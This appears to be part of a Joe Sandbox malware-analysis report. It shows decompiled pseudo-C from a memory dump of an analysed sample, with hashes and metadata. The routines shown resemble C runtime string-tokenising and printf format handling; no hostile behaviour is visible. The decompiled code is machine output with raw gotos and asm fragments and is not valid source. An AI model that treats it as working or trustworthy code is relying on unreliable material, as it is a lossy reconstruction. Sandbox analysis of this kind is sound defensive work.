                                                                                                                            				if ( *((intOrPtr*)(__rcx + (__r8 | 0xffffffff) + 1)) != r15b) goto 0xf8a78047;
                                                                                                                            				E0000025B25BF8A7A840(_t47,  *((intOrPtr*)(__rcx + (__r8 | 0xffffffff) + 1)) - r15b, _t69, __rcx, (__r8 | 0xffffffff) + 1 + _t110);
                                                                                                                            				 *0xf8aa21d8 = r15d;
                                                                                                                            				strtok(_t112);
                                                                                                                            				if (_t69 == 0) goto 0xf8a780a8;
                                                                                                                            				 *((long long*)(0xf8aa21e0 +  *0xf8aa21d8 * 8)) = _t69;
                                                                                                                            				 *0xf8aa21d8 = _t47 + r12d;
                                                                                                                            				_t27 = strtok(_t110);
                                                                                                                            				goto 0xf8a7807f;
                                                                                                                            				 *0xf8aa21dc = r15d;
                                                                                                                            				E0000025B25BF8A7B50C(_t27, __rbx,  *0xf8aa1b80);
                                                                                                                            				r9d =  *((intOrPtr*)(__r8 + 0xc));
                                                                                                                            				r8d =  *((intOrPtr*)(__r8 + 8));
                                                                                                                            				 *0xf8a9c430 =  *((intOrPtr*)(__r8 + 4));
                                                                                                                            				 *0xf8aa2820 = _t69;
                                                                                                                            				 *0xf8aa2828 = _t114;
                                                                                                                            				 *0xf8a9c438 = r9d;
                                                                                                                            				 *0xf8a9c434 = r8d;
                                                                                                                            				goto 0xf8a78108;
                                                                                                                            				_t91 =  *0xf8aa2828;
                                                                                                                            				r9d =  *0xf8a9c438; // 0x0
                                                                                                                            				r8d =  *0xf8a9c434; // 0x0
                                                                                                                            				if (r14d == 0) goto 0xf8a7815a;
                                                                                                                            				if (r9d - 0xffffffff <= 0) goto 0xf8a78129;
                                                                                                                            				 *0xf8aa1b8c =  *0xf8aa1b8c + r12d;
                                                                                                                            				_t34 =  >  ? r12d : r15d;
                                                                                                                            				if (r8d - 0xffffffff <= 0) goto 0xf8a78171;
                                                                                                                            				if (_t91 == 0) goto 0xf8a78144;
                                                                                                                            				_t71 = r8d + _t91;
                                                                                                                            				if (_t101 - _t71 <= 0) goto 0xf8a78171;
                                                                                                                            				goto 0xf8a78171;
                                                                                                                            				_t31 = E0000025B25BF8A7B50C( *0xf8aa1b8c + r12d, __rbx,  *0xf8aa1b80);
                                                                                                                            				_t42 =  *0xf8a9c430; // 0x0
                                                                                                                            				 *0xf8aa2828 = _t71;
                                                                                                                            				goto 0xf8a78171;
                                                                                                                            				if ( *0xf8aa1b88 != r15d) goto 0xf8a78171;
                                                                                                                            				 *0xf8aa2828 = _t114;
                                                                                                                            				 *0xf8aa1b8c = r15d;
                                                                                                                            				if (_t42 - 0xffffffff <= 0) goto 0xf8a78195;
                                                                                                                            				if (r12d != 0) goto 0xf8a78199;
                                                                                                                            				if ( *0xf8aa1b88 != r15d) goto 0xf8a781f2;
                                                                                                                            				_t73 = _t42 +  *0xf8aa2820;
                                                                                                                            				if (_t101 - _t73 <= 0) goto 0xf8a781de;
                                                                                                                            				if (r12d == 0) goto 0xf8a781d5;
                                                                                                                            				 *0xf8aa1b8c = r15d;
                                                                                                                            				 *0xf8aa1b88 = r15d;
                                                                                                                            				_t44 =  *0xf8aa21dc + 2;
                                                                                                                            				 *0xf8aa2828 = _t114;
                                                                                                                            				_t45 =  >=  ? r15d : _t44;
                                                                                                                            				 *0xf8aa21dc =  >=  ? r15d : _t44;
                                                                                                                            				_t32 = E0000025B25BF8A7B50C(_t31, __rbx,  *0xf8aa1b80);
                                                                                                                            				 *0xf8aa2820 = _t73;
                                                                                                                            				if ( *0xf8aa1b88 != r15d) goto 0xf8a781f2;
                                                                                                                            				 *0xf8aa1b88 = r12d;
                                                                                                                            				goto 0xf8a78205;
                                                                                                                            				 *0xf8aa1b88 = r15d;
                                                                                                                            				return _t32;
                                                                                                                            			}





















                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: strtok$malloc$_time64$_errno_getptdfree
                                                                                                                            • String ID: ltithread lock error
                                                                                                                            • API String ID: 12760750-589952550
                                                                                                                            • Opcode ID: 365941de4c75aef1f512cb7679ef445106154f63b37aea8ec8384c6663aa20e6
                                                                                                                            • Instruction ID: 4c9ba27664d97ac3d64a47beca83f73a9389d28905bc99a35c92b109dd92d3bc
                                                                                                                            • Opcode Fuzzy Hash: 365941de4c75aef1f512cb7679ef445106154f63b37aea8ec8384c6663aa20e6
                                                                                                                            • Instruction Fuzzy Hash: B9B15973711E40D6EF178B15AC48368BBA4F7447B3F30461ABA2607EA5DB38C461A72C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 48%
                                                                                                                            			E0000025B25BF8A7C154(void* __ebx, void* __edx, void* __eflags, long long __rbx, long long __rcx, signed int* __rdx, void* __r8, intOrPtr* __r9, long long __r10, void* __r11) {
                                                                                                                            				void* __rdi;
                                                                                                                            				void* __rsi;
                                                                                                                            				void* __rbp;
                                                                                                                            				void* __r12;
                                                                                                                            				void* _t223;
                                                                                                                            				void* _t224;
                                                                                                                            				void* _t227;
                                                                                                                            				void* _t231;
                                                                                                                            				void* _t234;
                                                                                                                            				char _t235;
                                                                                                                            				signed int _t236;
                                                                                                                            				void* _t240;
                                                                                                                            				signed int _t241;
                                                                                                                            				void* _t245;
                                                                                                                            				signed int _t246;
                                                                                                                            				signed int _t251;
                                                                                                                            				signed int _t257;
                                                                                                                            				void* _t263;
                                                                                                                            				signed int _t281;
                                                                                                                            				signed int _t296;
                                                                                                                            				signed int _t298;
                                                                                                                            				void* _t310;
                                                                                                                            				signed int _t316;
                                                                                                                            				signed int _t319;
                                                                                                                            				signed int _t337;
                                                                                                                            				void* _t338;
                                                                                                                            				intOrPtr _t348;
                                                                                                                            				signed int _t375;
                                                                                                                            				signed int _t381;
                                                                                                                            				void* _t389;
                                                                                                                            				char* _t393;
                                                                                                                            				signed int _t399;
                                                                                                                            				void* _t423;
                                                                                                                            				signed long long _t437;
                                                                                                                            				signed long long _t438;
                                                                                                                            				intOrPtr _t444;
                                                                                                                            				char* _t448;
                                                                                                                            				long long* _t449;
                                                                                                                            				signed long long _t453;
                                                                                                                            				intOrPtr _t459;
                                                                                                                            				void* _t462;
                                                                                                                            				char* _t464;
                                                                                                                            				char* _t466;
                                                                                                                            				char* _t468;
                                                                                                                            				signed short* _t469;
                                                                                                                            				signed long long _t476;
                                                                                                                            				void* _t477;
                                                                                                                            				intOrPtr* _t478;
                                                                                                                            				void* _t510;
                                                                                                                            				void* _t518;
                                                                                                                            				signed int* _t521;
                                                                                                                            				signed int* _t522;
                                                                                                                            				signed int* _t523;
                                                                                                                            				signed int* _t524;
                                                                                                                            				void* _t528;
                                                                                                                            				void* _t531;
                                                                                                                            				void* _t532;
                                                                                                                            				void* _t534;
                                                                                                                            				signed long long _t535;
                                                                                                                            				signed long long _t545;
                                                                                                                            				signed long long _t559;
                                                                                                                            				signed long long _t571;
                                                                                                                            				void* _t573;
                                                                                                                            				intOrPtr* _t575;
                                                                                                                            				intOrPtr* _t577;
                                                                                                                            				long long _t580;
                                                                                                                            				intOrPtr* _t581;
                                                                                                                            				signed int* _t582;
                                                                                                                            				void* _t586;
                                                                                                                            				void* _t588;
                                                                                                                            
                                                                                                                            				 *((long long*)(_t534 + 0x18)) = __rbx;
                                                                                                                            				_t532 = _t534 - 0x1e0;
                                                                                                                            				_t535 = _t534 - 0x2e0;
                                                                                                                            				_t437 =  *0xf8a9c990; // 0x18002eb3c
                                                                                                                            				_t438 = _t437 ^ _t535;
                                                                                                                            				 *(_t532 + 0x1d8) = _t438;
                                                                                                                            				 *((long long*)(_t535 + 0x68)) = __rcx;
                                                                                                                            				 *((intOrPtr*)(_t535 + 0x60)) = 0;
                                                                                                                            				r14d = 0;
                                                                                                                            				 *(_t535 + 0x54) = 0;
                                                                                                                            				r12d = 0;
                                                                                                                            				 *(_t535 + 0x48) = 0;
                                                                                                                            				 *(_t535 + 0x5c) = 0;
                                                                                                                            				 *(_t535 + 0x50) = 0;
                                                                                                                            				E0000025B25BF8A7C0AC(_t438, _t532 - 0x58, __r8);
                                                                                                                            				E0000025B25BF8A7B89C(_t438);
                                                                                                                            				r8d = r8d | 0xffffffff;
                                                                                                                            				r10d = 0;
                                                                                                                            				 *(_t532 - 0x70) = _t438;
                                                                                                                            				if (__rcx == 0) goto 0xf8a7cb1f;
                                                                                                                            				if (( *(__rcx + 0x18) & 0x00000040) != 0) goto 0xf8a7c273;
                                                                                                                            				_t559 = E0000025B25BF8A7F864(__edx, _t438, __rcx);
                                                                                                                            				if (_t559 + 2 - 1 <= 0) goto 0xf8a7c222;
                                                                                                                            				r8d = r8d & 0x0000001f;
                                                                                                                            				goto 0xf8a7c225;
                                                                                                                            				if (( *0x25BF8A9D2B8 & 0x0000007f) != 0) goto 0xf8a7cb1f;
                                                                                                                            				if (_t559 + 2 - 1 <= 0) goto 0xf8a7c25b;
                                                                                                                            				goto 0xf8a7c262;
                                                                                                                            				if (( *(_t559 * 0x58 +  *((intOrPtr*)(0x25bf8a5f400 + 0x43e00 + (_t559 >> 5) * 8)) + 0x38) & 0x00000080) != 0) goto 0xf8a7cb1f;
                                                                                                                            				r8d = r8d | 0xffffffff;
                                                                                                                            				r10d = 0;
                                                                                                                            				if (__rdx == 0) goto 0xf8a7cb1f;
                                                                                                                            				r15b =  *__rdx;
                                                                                                                            				 *(_t535 + 0x40) = r10d;
                                                                                                                            				 *(_t535 + 0x44) = r10d;
                                                                                                                            				_t296 = r10d;
                                                                                                                            				 *((long long*)(_t532 - 0x80)) = __r10;
                                                                                                                            				if (r15b == 0) goto 0xf8a7cb37;
                                                                                                                            				r11d = 0x200;
                                                                                                                            				 *(_t532 - 0x68) =  &(__rdx[0]);
                                                                                                                            				if (r10d < 0) goto 0xf8a7cb37;
                                                                                                                            				_t38 = _t588 - 0x20; // -32
                                                                                                                            				if (_t38 - 0x58 > 0) goto 0xf8a7c2cf;
                                                                                                                            				asm("por mm0, [ebx]");
                                                                                                                            				_t476 = r10d;
                                                                                                                            				_t298 =  *(_t296 + _t476 * 8 + 0x25bf8a8d920) >> 4;
                                                                                                                            				 *(_t535 + 0x58) = _t298;
                                                                                                                            				_t337 = _t298;
                                                                                                                            				if (_t337 == 0) goto 0xf8a7c9e1;
                                                                                                                            				if (_t337 == 0) goto 0xf8a7cafb;
                                                                                                                            				if (_t337 == 0) goto 0xf8a7caab;
                                                                                                                            				if (_t337 == 0) goto 0xf8a7ca6f;
                                                                                                                            				if (_t337 == 0) goto 0xf8a7ca67;
                                                                                                                            				if (_t337 == 0) goto 0xf8a7ca32;
                                                                                                                            				if (_t337 == 0) goto 0xf8a7c957;
                                                                                                                            				if (_t337 != 0) goto 0xf8a7c942;
                                                                                                                            				_t281 = r15b;
                                                                                                                            				_t338 = _t281 - 0x64;
                                                                                                                            				if (_t338 > 0) goto 0xf8a7c4a4;
                                                                                                                            				if (_t338 == 0) goto 0xf8a7c5a5;
                                                                                                                            				if (_t281 == 0x41) goto 0xf8a7c479;
                                                                                                                            				if (_t281 == 0x43) goto 0xf8a7c41f;
                                                                                                                            				if ((_t476 - 0x00000045 & 0xfffffffd) == 0) goto 0xf8a7c479;
                                                                                                                            				if (_t281 == 0x53) goto 0xf8a7c3d3;
                                                                                                                            				if (_t281 == 0x58) goto 0xf8a7c53e;
                                                                                                                            				if (_t281 == 0x5a) goto 0xf8a7c38b;
                                                                                                                            				if (_t281 == 0x61) goto 0xf8a7c485;
                                                                                                                            				if (_t281 == 0x63) goto 0xf8a7c42d;
                                                                                                                            				goto 0xf8a7c7b0;
                                                                                                                            				_t444 =  *__r9;
                                                                                                                            				_t575 = __r9 + 8;
                                                                                                                            				if (_t444 == 0) goto 0xf8a7c3c7;
                                                                                                                            				_t348 =  *((intOrPtr*)(_t444 + 8));
                                                                                                                            				if (_t348 == 0) goto 0xf8a7c3c7;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				if (_t348 >= 0) goto 0xf8a7c3bd;
                                                                                                                            				asm("cdq");
                                                                                                                            				 *(_t535 + 0x50) = 1;
                                                                                                                            				goto 0xf8a7c7ac;
                                                                                                                            				 *(_t535 + 0x50) = r10d;
                                                                                                                            				goto 0xf8a7c7ac;
                                                                                                                            				goto 0xf8a7c7a1;
                                                                                                                            				if ((r14d & 0x00000830) != 0) goto 0xf8a7c3e1;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				_t459 =  *_t575;
                                                                                                                            				_t223 =  ==  ? 0x7fffffff : r12d;
                                                                                                                            				if ((r14d & 0x00000810) == 0) goto 0xf8a7c50a;
                                                                                                                            				 *(_t535 + 0x50) = 1;
                                                                                                                            				_t460 =  ==  ?  *0xf8a9c5c0 : _t459;
                                                                                                                            				_t477 =  ==  ?  *0xf8a9c5c0 : _t459;
                                                                                                                            				goto 0xf8a7c4fe;
                                                                                                                            				if ((r14d & 0x00000830) != 0) goto 0xf8a7c42d;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				_t577 = _t575 + 0x10;
                                                                                                                            				if ((r14d & 0x00000810) == 0) goto 0xf8a7c461;
                                                                                                                            				r9d =  *(_t577 - 8) & 0x0000ffff;
                                                                                                                            				_t510 = _t532 - 0x30;
                                                                                                                            				_t478 = _t535 + 0x44;
                                                                                                                            				_t224 = E0000025B25BF8A833AC();
                                                                                                                            				r10d = 0;
                                                                                                                            				if (_t224 == 0) goto 0xf8a7c470;
                                                                                                                            				 *(_t535 + 0x5c) = 1;
                                                                                                                            				goto 0xf8a7c470;
                                                                                                                            				 *(_t535 + 0x44) = 1;
                                                                                                                            				 *((char*)(_t532 - 0x30)) =  *(_t577 - 8);
                                                                                                                            				goto 0xf8a7c7b0;
                                                                                                                            				 *(_t535 + 0x78) = 1;
                                                                                                                            				r15b = r15b + 0x20;
                                                                                                                            				r14d = r14d | 0x00000040;
                                                                                                                            				_t462 = _t532 - 0x30;
                                                                                                                            				_t319 = r11d;
                                                                                                                            				if (r12d >= 0) goto 0xf8a7c6c3;
                                                                                                                            				r12d = 6;
                                                                                                                            				goto 0xf8a7c709;
                                                                                                                            				if (0x7fffffff - 0x65 < 0) goto 0xf8a7c7b0;
                                                                                                                            				if (0x7fffffff - 0x67 <= 0) goto 0xf8a7c485;
                                                                                                                            				if (0x7fffffff == 0x69) goto 0xf8a7c5a5;
                                                                                                                            				if (0x7fffffff == 0x6e) goto 0xf8a7c573;
                                                                                                                            				if (0x7fffffff == 0x6f) goto 0xf8a7c563;
                                                                                                                            				if (0x7fffffff == 0x70) goto 0xf8a7c533;
                                                                                                                            				if (0x7fffffff == 0x73) goto 0xf8a7c3e1;
                                                                                                                            				if (0x7fffffff == 0x75) goto 0xf8a7c5a9;
                                                                                                                            				if (0x7fffffff != 0x78) goto 0xf8a7c7b0;
                                                                                                                            				goto 0xf8a7c543;
                                                                                                                            				_t227 = _t478 - 0x50;
                                                                                                                            				if ( *_t478 == r10w) goto 0xf8a7c502;
                                                                                                                            				if (_t227 != 0) goto 0xf8a7c4f2;
                                                                                                                            				goto 0xf8a7c52a;
                                                                                                                            				_t463 =  ==  ?  *0xf8a9c5b8 : _t462;
                                                                                                                            				_t482 =  ==  ?  *0xf8a9c5b8 : _t462;
                                                                                                                            				goto 0xf8a7c524;
                                                                                                                            				if ( *((intOrPtr*)( ==  ?  *0xf8a9c5b8 : _t462)) == r10b) goto 0xf8a7c528;
                                                                                                                            				if (_t227 - 1 != 0) goto 0xf8a7c51a;
                                                                                                                            				 *(_t535 + 0x44) = 0x7fffffff;
                                                                                                                            				goto 0xf8a7c7b0;
                                                                                                                            				r12d = 0x10;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				 *((intOrPtr*)(_t535 + 0x60)) = 7;
                                                                                                                            				r9d = 0x10;
                                                                                                                            				if (r14b >= 0) goto 0xf8a7c5af;
                                                                                                                            				 *((char*)(_t535 + 0x4c)) = 0x30;
                                                                                                                            				 *((char*)(_t535 + 0x4d)) = 0x58;
                                                                                                                            				goto 0xf8a7c5b3;
                                                                                                                            				r9d = 8;
                                                                                                                            				if (r14b >= 0) goto 0xf8a7c5af;
                                                                                                                            				r14d = r14d | r11d;
                                                                                                                            				goto 0xf8a7c5af;
                                                                                                                            				_t521 =  *_t577;
                                                                                                                            				_t231 = E0000025B25BF8A79CA0();
                                                                                                                            				r10d = 0;
                                                                                                                            				if (_t231 == 0) goto 0xf8a7cb1f;
                                                                                                                            				if ((r14b & 0x00000020) == 0) goto 0xf8a7c596;
                                                                                                                            				 *_t521 = _t319;
                                                                                                                            				goto 0xf8a7c598;
                                                                                                                            				 *_t521 = _t319;
                                                                                                                            				 *(_t535 + 0x5c) = 1;
                                                                                                                            				goto 0xf8a7c911;
                                                                                                                            				r14d = r14d | 0x00000040;
                                                                                                                            				r9d = 0xa;
                                                                                                                            				_t375 = 0x00008000 & r14d;
                                                                                                                            				if (_t375 == 0) goto 0xf8a7c5c7;
                                                                                                                            				goto 0xf8a7c601;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				if (_t375 < 0) goto 0xf8a7c5bd;
                                                                                                                            				_t580 = _t577 + 0x18;
                                                                                                                            				if ((r14b & 0x00000020) == 0) goto 0xf8a7c5f1;
                                                                                                                            				 *((long long*)(_t535 + 0x70)) = _t580;
                                                                                                                            				if ((r14b & 0x00000040) == 0) goto 0xf8a7c5ea;
                                                                                                                            				goto 0xf8a7c606;
                                                                                                                            				r8d =  *(_t580 - 8) & 0x0000ffff;
                                                                                                                            				goto 0xf8a7c606;
                                                                                                                            				if ((r14b & 0x00000040) == 0) goto 0xf8a7c5fd;
                                                                                                                            				_t545 =  *(_t580 - 8);
                                                                                                                            				goto 0xf8a7c601;
                                                                                                                            				r8d =  *(_t580 - 8);
                                                                                                                            				 *((long long*)(_t535 + 0x70)) = _t580;
                                                                                                                            				if ((r14b & 0x00000040) == 0) goto 0xf8a7c619;
                                                                                                                            				if (_t545 >= 0) goto 0xf8a7c619;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				_t381 = 0x00008000 & r14d;
                                                                                                                            				if (_t381 != 0) goto 0xf8a7c628;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				if (_t381 < 0) goto 0xf8a7c628;
                                                                                                                            				if (r12d >= 0) goto 0xf8a7c635;
                                                                                                                            				r12d = 1;
                                                                                                                            				goto 0xf8a7c640;
                                                                                                                            				r14d = r14d & 0xfffffff7;
                                                                                                                            				r12d =  >  ? r11d : r12d;
                                                                                                                            				r13d =  *((intOrPtr*)(_t535 + 0x60));
                                                                                                                            				_t464 = _t532 + 0x1cf;
                                                                                                                            				asm("sbb ecx, ecx");
                                                                                                                            				 *(_t535 + 0x48) = 0x7fffffff - __ebx &  *(_t535 + 0x48);
                                                                                                                            				r12d = r12d - 1;
                                                                                                                            				if (r12d > 0) goto 0xf8a7c669;
                                                                                                                            				if ( ~_t545 == 0) goto 0xf8a7c689;
                                                                                                                            				_t106 = _t510 + 0x30; // 0x30
                                                                                                                            				_t234 = _t106;
                                                                                                                            				if (_t234 - 0x39 <= 0) goto 0xf8a7c682;
                                                                                                                            				_t235 = _t234 + r13d;
                                                                                                                            				 *_t464 = _t235;
                                                                                                                            				goto 0xf8a7c65a;
                                                                                                                            				_t581 =  *((intOrPtr*)(_t535 + 0x70));
                                                                                                                            				_t448 = _t532 + 0x1cf;
                                                                                                                            				_t236 = _t235 - __ebx;
                                                                                                                            				_t466 = _t464 - 1 + 1;
                                                                                                                            				 *(_t535 + 0x44) = _t236;
                                                                                                                            				if ((r11d & r14d) == 0) goto 0xf8a7c7b0;
                                                                                                                            				if (_t236 == 0) goto 0xf8a7c6b4;
                                                                                                                            				_t389 =  *_t466 - 0x30;
                                                                                                                            				if (_t389 == 0) goto 0xf8a7c7b0;
                                                                                                                            				 *(_t535 + 0x44) =  *(_t535 + 0x44) + 1;
                                                                                                                            				 *((char*)(_t466 - 1)) = 0x30;
                                                                                                                            				goto 0xf8a7c7b0;
                                                                                                                            				if (_t389 != 0) goto 0xf8a7c6d3;
                                                                                                                            				if (r15b != 0x67) goto 0xf8a7c709;
                                                                                                                            				r12d = 1;
                                                                                                                            				goto 0xf8a7c709;
                                                                                                                            				r12d =  >  ? r11d : r12d;
                                                                                                                            				if (r12d - 0xa3 <= 0) goto 0xf8a7c709;
                                                                                                                            				_t310 = _t571 + 0x15d;
                                                                                                                            				E0000025B25BF8A7E798(_t466 - 1, _t310, _t521, _t528, _t532);
                                                                                                                            				 *((long long*)(_t532 - 0x80)) = _t448;
                                                                                                                            				_t393 = _t448;
                                                                                                                            				if (_t393 == 0) goto 0xf8a7c703;
                                                                                                                            				_t468 = _t448;
                                                                                                                            				goto 0xf8a7c709;
                                                                                                                            				r12d = 0xa3;
                                                                                                                            				_t449 =  *_t581;
                                                                                                                            				_t582 = _t581 + 8;
                                                                                                                            				_t529 = _t310;
                                                                                                                            				 *((long long*)(_t532 - 0x60)) = _t449;
                                                                                                                            				"%d\t%d\t%s\n"();
                                                                                                                            				r9d = r15b;
                                                                                                                            				 *((long long*)(_t535 + 0x30)) = _t532 - 0x58;
                                                                                                                            				 *(_t535 + 0x28) =  *(_t535 + 0x78);
                                                                                                                            				 *(_t535 + 0x20) = r12d;
                                                                                                                            				 *_t449(_t588, _t586, _t573, _t571, _t518, _t528, _t531);
                                                                                                                            				if (_t393 == 0) goto 0xf8a7c774;
                                                                                                                            				if (r12d != 0) goto 0xf8a7c774;
                                                                                                                            				"%d\t%d\t%s\n"();
                                                                                                                            				 *_t449();
                                                                                                                            				if (r15b != 0x67) goto 0xf8a7c794;
                                                                                                                            				if ((r14d & 0x00000080) != 0) goto 0xf8a7c794;
                                                                                                                            				"%d\t%d\t%s\n"();
                                                                                                                            				_t240 =  *_t449();
                                                                                                                            				if ( *_t468 != 0x2d) goto 0xf8a7c7a1;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				_t469 = _t468 + 1;
                                                                                                                            				_t241 = E0000025B25BF8A82800(_t240, _t469);
                                                                                                                            				r10d = 0;
                                                                                                                            				 *(_t535 + 0x44) = _t241;
                                                                                                                            				if ( *(_t535 + 0x5c) != r10d) goto 0xf8a7c911;
                                                                                                                            				_t399 = r14b & 0x00000040;
                                                                                                                            				if (_t399 == 0) goto 0xf8a7c7f2;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				if (_t399 >= 0) goto 0xf8a7c7cf;
                                                                                                                            				 *((char*)(_t535 + 0x4c)) = 0x2d;
                                                                                                                            				goto 0xf8a7c7da;
                                                                                                                            				if ((r14b & 0x00000001) == 0) goto 0xf8a7c7e5;
                                                                                                                            				 *((char*)(_t535 + 0x4c)) = 0x2b;
                                                                                                                            				 *(_t535 + 0x48) = 1;
                                                                                                                            				goto 0xf8a7c7f6;
                                                                                                                            				if ((r14b & 0x00000002) == 0) goto 0xf8a7c7f2;
                                                                                                                            				 *((char*)(_t535 + 0x4c)) = 0x20;
                                                                                                                            				goto 0xf8a7c7da;
                                                                                                                            				if ((r14b & 0x0000000c) != 0) goto 0xf8a7c81c;
                                                                                                                            				E0000025B25BF8A7CBBC(0x20,  *(_t535 + 0x54) -  *(_t535 + 0x44) -  *(_t535 + 0x48), _t469, _t310, _t532,  *((intOrPtr*)(_t535 + 0x68)), _t535 + 0x40);
                                                                                                                            				 *(_t535 + 0x20) =  *(_t532 - 0x70);
                                                                                                                            				E0000025B25BF8A7D648( *(_t535 + 0x48), _t469, _t535 + 0x4c, _t310, _t532,  *((intOrPtr*)(_t535 + 0x68)), _t535 + 0x40);
                                                                                                                            				if ((r14b & 0x00000008) == 0) goto 0xf8a7c856;
                                                                                                                            				if ((r14b & 0x00000004) != 0) goto 0xf8a7c856;
                                                                                                                            				E0000025B25BF8A7CBBC(0x30,  *(_t535 + 0x54) -  *(_t535 + 0x44) -  *(_t535 + 0x48), _t469, _t310, _t532,  *((intOrPtr*)(_t535 + 0x68)), _t535 + 0x40);
                                                                                                                            				_t316 =  *(_t535 + 0x44);
                                                                                                                            				if ( *(_t535 + 0x50) == 0) goto 0xf8a7c8d1;
                                                                                                                            				if (_t316 <= 0) goto 0xf8a7c8d1;
                                                                                                                            				r9d =  *_t469 & 0x0000ffff;
                                                                                                                            				r8d = 6;
                                                                                                                            				_t245 = E0000025B25BF8A833AC();
                                                                                                                            				r10d = 0;
                                                                                                                            				if (_t245 != 0) goto 0xf8a7c8c3;
                                                                                                                            				if ( *((intOrPtr*)(_t532 - 0x78)) == 0) goto 0xf8a7c8c3;
                                                                                                                            				 *(_t535 + 0x20) =  *(_t532 - 0x70);
                                                                                                                            				_t246 = E0000025B25BF8A7D648( *((intOrPtr*)(_t532 - 0x78)), _t469, _t532 + 0x1d0, _t310, _t532,  *((intOrPtr*)(_t535 + 0x68)), _t535 + 0x40);
                                                                                                                            				r10d = 0;
                                                                                                                            				if (_t316 - 1 != 0) goto 0xf8a7c868;
                                                                                                                            				goto 0xf8a7c8ef;
                                                                                                                            				 *(_t535 + 0x40) = _t246 | 0xffffffff;
                                                                                                                            				goto 0xf8a7c8f3;
                                                                                                                            				 *(_t535 + 0x20) =  *(_t532 - 0x70);
                                                                                                                            				E0000025B25BF8A7D648(_t316 - 1, _t469, _t469, _t310, _t532,  *((intOrPtr*)(_t535 + 0x68)), _t535 + 0x40);
                                                                                                                            				r10d = 0;
                                                                                                                            				if ( *(_t535 + 0x40) < 0) goto 0xf8a7c911;
                                                                                                                            				if ((r14b & 0x00000004) == 0) goto 0xf8a7c911;
                                                                                                                            				E0000025B25BF8A7CBBC(0x20,  *(_t535 + 0x54) -  *(_t535 + 0x44) -  *(_t535 + 0x48), _t469, _t529, _t532,  *((intOrPtr*)(_t535 + 0x68)), _t535 + 0x40);
                                                                                                                            				r10d = 0;
                                                                                                                            				_t453 =  *((intOrPtr*)(_t532 - 0x80));
                                                                                                                            				if (_t453 == 0) goto 0xf8a7c929;
                                                                                                                            				free(??);
                                                                                                                            				r10d = 0;
                                                                                                                            				 *((long long*)(_t532 - 0x80)) = __r10;
                                                                                                                            				_t522 =  *(_t532 - 0x68);
                                                                                                                            				r11d = 0x200;
                                                                                                                            				r15b =  *_t522;
                                                                                                                            				if (r15b == 0) goto 0xf8a7cb37;
                                                                                                                            				r8d = r8d | 0xffffffff;
                                                                                                                            				goto 0xf8a7c2a6;
                                                                                                                            				if (r15b == 0x49) goto 0xf8a7c991;
                                                                                                                            				if (r15b == 0x68) goto 0xf8a7c98b;
                                                                                                                            				if (r15b == 0x6c) goto 0xf8a7c976;
                                                                                                                            				if (r15b != 0x77) goto 0xf8a7c942;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				if ( *_t522 != 0x6c) goto 0xf8a7c985;
                                                                                                                            				_t523 =  &(_t522[0]);
                                                                                                                            				asm("inc ecx");
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				r14d = r14d | 0x00000010;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				r14d = r14d | 0x00000020;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				_t251 =  *_t523;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				if (_t251 != 0x36) goto 0xf8a7c9ad;
                                                                                                                            				if (_t523[0] != 0x34) goto 0xf8a7c9ad;
                                                                                                                            				_t524 =  &(_t523[0]);
                                                                                                                            				asm("inc ecx");
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				if (_t251 != 0x33) goto 0xf8a7c9c2;
                                                                                                                            				if (_t524[0] != 0x32) goto 0xf8a7c9c2;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				_t423 = _t251 - 0x58 - 0x20;
                                                                                                                            				if (_t423 > 0) goto 0xf8a7c9dc;
                                                                                                                            				asm("dec eax");
                                                                                                                            				if (_t423 < 0) goto 0xf8a7c942;
                                                                                                                            				 *(_t535 + 0x58) = r10d;
                                                                                                                            				 *(_t535 + 0x50) = r10d;
                                                                                                                            				if (E0000025B25BF8A83194(r15b & 0xffffffff, _t423, _t453, _t532 - 0x58) == 0) goto 0xf8a7ca18;
                                                                                                                            				E0000025B25BF8A7CB74(r15b,  *((intOrPtr*)(_t535 + 0x68)), _t535 + 0x40);
                                                                                                                            				r15b = _t524[0];
                                                                                                                            				if (r15b == 0) goto 0xf8a7cb1f;
                                                                                                                            				E0000025B25BF8A7CB74(r15b,  *((intOrPtr*)(_t535 + 0x68)), _t535 + 0x40);
                                                                                                                            				r10d = 0;
                                                                                                                            				goto 0xf8a7c92d;
                                                                                                                            				if (r15b != 0x2a) goto 0xf8a7ca51;
                                                                                                                            				r12d =  *_t582;
                                                                                                                            				if (r12d >= 0) goto 0xf8a7c942;
                                                                                                                            				r12d = r8d;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				r12d = _t571 + _t571 * 4;
                                                                                                                            				r12d = _t571 - 0x18;
                                                                                                                            				r12d = _t453 + _t571 * 2;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				r12d = r10d;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				if (r15b != 0x2a) goto 0xf8a7ca91;
                                                                                                                            				_t257 = _t582[2];
                                                                                                                            				 *(_t535 + 0x54) = _t257;
                                                                                                                            				if (_t257 >= 0) goto 0xf8a7c942;
                                                                                                                            				r14d = r14d | 0x00000004;
                                                                                                                            				goto 0xf8a7caa2;
